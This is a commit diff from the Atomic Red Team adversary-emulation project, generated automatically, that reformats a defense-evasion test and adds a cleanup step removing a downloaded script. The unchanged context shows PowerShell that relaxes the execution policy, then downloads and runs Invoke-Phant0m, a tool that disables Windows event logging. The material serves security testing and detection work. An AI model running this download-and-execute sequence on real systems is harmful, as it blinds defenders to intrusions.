Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

This commit is contained in:
CircleCI Atomic Red Team doc generator
2021-04-30 20:53:20 +00:00
parent 6b724298f1
commit 6bd8fc68e7
2 changed files with 5 additions and 3 deletions
+4 -3
View File
@@ -29356,7 +29356,7 @@ defense-evasion:
supported_platforms:
- windows
executor:
command: |-
command: |
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
$url = "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1"
$output = "$env:TEMP\Invoke-Phant0m.ps1"
@@ -29365,8 +29365,9 @@ defense-evasion:
cd $env:TEMP
Import-Module .\Invoke-Phant0m.ps1
Invoke-Phant0m
cleanup_command: Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS"
-fore red
cleanup_command: |
Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Impair Windows Audit Log Policy
+1
View File
@@ -81,6 +81,7 @@ Invoke-Phant0m
#### Cleanup Commands:
```powershell
Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
```